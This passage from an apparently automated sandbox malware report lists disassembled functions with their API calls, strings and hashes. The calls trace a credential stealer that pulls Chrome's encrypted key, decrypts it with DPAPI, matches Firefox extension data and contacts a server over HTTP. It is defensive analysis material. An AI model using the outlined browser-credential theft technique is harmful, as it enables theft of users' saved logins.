                                                                                                                            • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                            • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                            • API String ID: 2929475105-2812842227
                                                                                                                            • Opcode ID: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
                                                                                                                            • Instruction ID: 1d1035b7872eafe5bc2acfcfd9c5443481a9431a5cd399c5b03dff48eed801cb
                                                                                                                            • Opcode Fuzzy Hash: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
                                                                                                                            • Instruction Fuzzy Hash: 20315C71940714ABCF16EF2AED0245D7BA2AB48706F10607BF440B72B0DB7A1A81CF89
                                                                                                                            Function 00416DC6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 00416DCD
                                                                                                                            • lstrlenA.KERNEL32(?,0000001C), ref: 00416DD8
                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416E5C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog3_catchlstrlen
                                                                                                                            • String ID: ERROR
                                                                                                                            • API String ID: 591506033-2861137601
                                                                                                                            • Opcode ID: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
                                                                                                                            • Instruction ID: af559da7a52deda925aca90371b7d636d26c87dd73bd3b1907a7f448f6be4e16
                                                                                                                            • Opcode Fuzzy Hash: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
                                                                                                                            • Instruction Fuzzy Hash: 6F119371900509AFCB40FF75D9025DDBBB1BF04308B90513AE414E3591E739EAA98FC9
                                                                                                                            Function 0041224A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
                                                                                                                            • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041228E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                            • String ID: =A
                                                                                                                            • API String ID: 3183270410-2399317284
                                                                                                                            • Opcode ID: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
                                                                                                                            • Instruction ID: 00f88837b3f4b8dbd17d966d98a560f1caae43d713f472eddac2d47ecb876e1e
                                                                                                                            • Opcode Fuzzy Hash: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
                                                                                                                            • Instruction Fuzzy Hash: D8F0B471600218ABDB24EB68DC45FEE7BBC9B48B08F00006AF645D7180EEB5DAC5CB55
                                                                                                                            Function 0040B332 Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0040B3D7
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040B529
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040B544
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040B596
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 211194620-0
                                                                                                                            • Opcode ID: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
                                                                                                                            • Instruction ID: f50e13fd7eda3401684194e3b4178dcbc35dad14aaafdb4021fb065c0cc55dd5
                                                                                                                            • Opcode Fuzzy Hash: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
                                                                                                                            • Instruction Fuzzy Hash: 6F714072A00119ABCF01FFA5EE468CD7775EF14309F104036F500B71A2DBB9AE898B99
                                                                                                                            Function 0040D40E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                              • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                              • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                              • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                              • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                              • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                            • StrStrA.SHLWAPI(00000000,?,00437538,0043688A), ref: 0040D49F
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040D4B2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                            • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                            • API String ID: 161838763-3310892237
                                                                                                                            • Opcode ID: 816962e9c3afc16b7876f5dffe6556581362ffbc47f3743437905f97f4b6a93d
                                                                                                                            • Instruction ID: 85de75ec200c89e9111d7c6d064248f53d90c55406061a5cb20e0ca06024b096
                                                                                                                            • Opcode Fuzzy Hash: 816962e9c3afc16b7876f5dffe6556581362ffbc47f3743437905f97f4b6a93d
                                                                                                                            • Instruction Fuzzy Hash: 15410B76A001199BCF10FBA6DD465CD77B5AF04308F51003AFD00B3192DBB8AE4D8AE9
                                                                                                                            Function 0040819F Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                              • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                              • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                              • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                              • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                              • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                            • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                                                              • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
                                                                                                                              • Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
                                                                                                                              • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
                                                                                                                              • Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093
                                                                                                                              • Part of subcall function 004080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                                              • Part of subcall function 004080A1: LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
                                                                                                                              • Part of subcall function 004080A1: LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                                                                                                            • String ID: $"encrypted_key":"$DPAPI
                                                                                                                            • API String ID: 2311102621-738592651
                                                                                                                            • Opcode ID: 737d85e22274ce53574d9f3d91b8069edbe1844aa71f10a5979b771c1d3bb9a1
                                                                                                                            • Instruction ID: d78dfd73ee8100a23edce15a91f2c70fa2f38e8288fa49592993377d3a11e596
                                                                                                                            • Opcode Fuzzy Hash: 737d85e22274ce53574d9f3d91b8069edbe1844aa71f10a5979b771c1d3bb9a1
                                                                                                                            • Instruction Fuzzy Hash: 1121C232E40209ABDF14EB91DD41ADE7378AF41364F2045BFE950B72D1DF38AA49CA58
                                                                                                                            Function 00416330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                            • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416378
                                                                                                                            • lstrcatA.KERNEL32(?), ref: 00416396
                                                                                                                              • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
                                                                                                                              • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
                                                                                                                              • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
                                                                                                                              • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
                                                                                                                              • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
                                                                                                                              • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
                                                                                                                              • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
                                                                                                                              • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
                                                                                                                              • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
                                                                                                                              • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
                                                                                                                              • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
                                                                                                                              • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
                                                                                                                              • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
                                                                                                                              • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
                                                                                                                              • Part of subcall function 00415FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00416229
                                                                                                                              • Part of subcall function 00415FD1: DeleteFileA.KERNEL32(?), ref: 0041629D
                                                                                                                              • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
                                                                                                                              • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                            • String ID: nzA
                                                                                                                            • API String ID: 2104210347-1761861442
                                                                                                                            • Opcode ID: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
                                                                                                                            • Instruction ID: 6a45041e7e61eaec4ac0428956384e3812b0c56a5955d947ae57416d2cc1f0af
                                                                                                                            • Opcode Fuzzy Hash: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
                                                                                                                            • Instruction Fuzzy Hash: DD31F77280010DEFDF15EB60DC43EE8377AEB08314F5440AEF606932A1EA769B919F55
                                                                                                                            Function 0041683E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                              • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                              • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                              • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                              • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                              • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                              • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416873
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                            • String ID: ERROR$ERROR
                                                                                                                            • API String ID: 3086566538-2579291623
                                                                                                                            • Opcode ID: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
                                                                                                                            • Instruction ID: fa6cd13a443083575c3a824eeb1e5676c961334a8f4b47820412c2fdc9a040c1
                                                                                                                            • Opcode Fuzzy Hash: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
                                                                                                                            • Instruction Fuzzy Hash: 6F014F75A00118ABCB20FB76D9469CD73A96F04308F55417BBC24E3293E7B8E9494AD9
                                                                                                                            Function 00416E97 Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4198075804-0
                                                                                                                            • Opcode ID: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
